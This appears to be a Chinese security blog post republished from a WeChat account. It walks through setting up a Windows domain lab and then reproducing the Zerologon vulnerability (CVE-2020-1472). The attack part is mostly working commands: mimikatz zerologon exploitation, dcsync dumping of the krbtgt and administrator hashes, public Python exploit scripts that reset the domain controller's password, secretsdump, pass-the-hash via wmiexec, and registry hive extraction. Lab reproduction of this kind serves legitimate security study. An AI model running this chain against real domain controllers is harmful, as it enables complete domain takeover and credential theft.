CVE-2020-1472 windows域控提权 zerologon从搭建到复现

  • A+
所属分类:安全文章

1,傻瓜化域安装


运行DCPROMO

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



第二步

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



第三步

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



第四步

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



第五步 选择是

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


第六步 设置完密码安装

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


第七步 安装成功

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


加入域

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


登录设置好的域密码

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


从域服务器看是否成功

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


新建个域普通用户

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

登录到域


2,ZeroLogon复现

信息收集:

net time /domain && net user/domain

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



获取域ip

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

然后使用mimikatz进行攻击

 

执行poc

lsadump::zerologon/target:WIN-171DIUDNLE5.yourdomain.com /account:WIN-171DIUDNLE5$

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


使用exp攻击

lsadump::zerologon /target:WIN-171DIUDNLE5.yourdomain.com/account:WIN-171DIUDNLE5$ /exploit

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



尝试使用空密码登录域管

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


lsadump::dcsync /domain:yourdomain.com/dc:WIN-171DIUDNLE5.yourdomain.com /user:krbtgt /authuser:WIN-171DIUDNLE5$/authdomain:yourdomain /authpassword:"" /authntlm

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



导出hash

lsadump::dcsync /domain:yourdomain.com/dc:WIN-171DIUDNLE5.yourdomain.com /user:administrator /authuser:WIN-171DIUDNLE5$/authdomain:yourdomain /authpassword: /authntlm

CVE-2020-1472 windows域控提权 zerologon从搭建到复现



解密获取明文

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


导出到文本

"lsadump::dcsync/domain:yourdomain.com /dc:WIN-171DIUDNLE5.yourdomain.com /user:administrator/authuser:WIN-171DIUDNLE5$ /authdomain:yourdomain /authpassword:/authntlm" >>1.txt

 

恢复密码

lsadump::postzerologon /target:yourip/account:WIN-171DIUDNLE5$

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


恢复后

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

密码会改成password updated里的内容

 

3,python实战复现


先用测试导出哈希测试渠道

1.git clone https://github.com/mstxq17/cve-2020-1472.git2.pip3 install -r requirements.txt

 

proxychains4 secretsdump.py topsectest/Administrator:'password'@yourip -just-dc-user "WIN-171DIUDNLE5$"

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


exp报错

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket && pip3 install .

测试是否存在漏洞:
proxychains python3 zerologon_tester.py WIN-171DIUDNLE5 yourip

 

成功

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

重置域密码:

proxychains python3 cve-2020-1472-exploit.py WIN-171DIUDNLE5 yourip

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

 

导出哈希

proxychains secretsdump.py yourdomain.com/WIN-171DIUDNLE5$@yourip-no-pass


CVE-2020-1472 windows域控提权 zerologon从搭建到复现

 

执行命令

 

wmiexec.py -hashes  proxychains python3 /usr/local/bin/wmiexec.py-hashes aad3b435b51404eeaad3b435b51404ee:00affd88fa****4560bf9fef0ec2f username/[email protected]

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

 

 

恢复密码

- reg save HKLMSYSTEM system.save- reg save HKLMSAM sam.save- reg save HKLMSECURITY security.save- get system.save- get sam.save- get security.save- del /f system.save- del /f sam.save- del /f security.save


导出

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

下载到kail

CVE-2020-1472 windows域控提权 zerologon从搭建到复现


提取

secretsdump.py -sam sam.save-system system.save -security security.save LOCAL


CVE-2020-1472 windows域控提权 zerologon从搭建到复现


恢复

python3 restorepassword.py WIN-171DIUDNLE5@WIN-171DIUDNLE5 -target-ip yourip -hexpass 570061007a0061003100320*****a00610031003200330034002f00
CVE-2020-1472 windows域控提权 zerologon从搭建到复现


本文始发于微信公众号(白帽100安全攻防实验室):CVE-2020-1472 windows域控提权 zerologon从搭建到复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: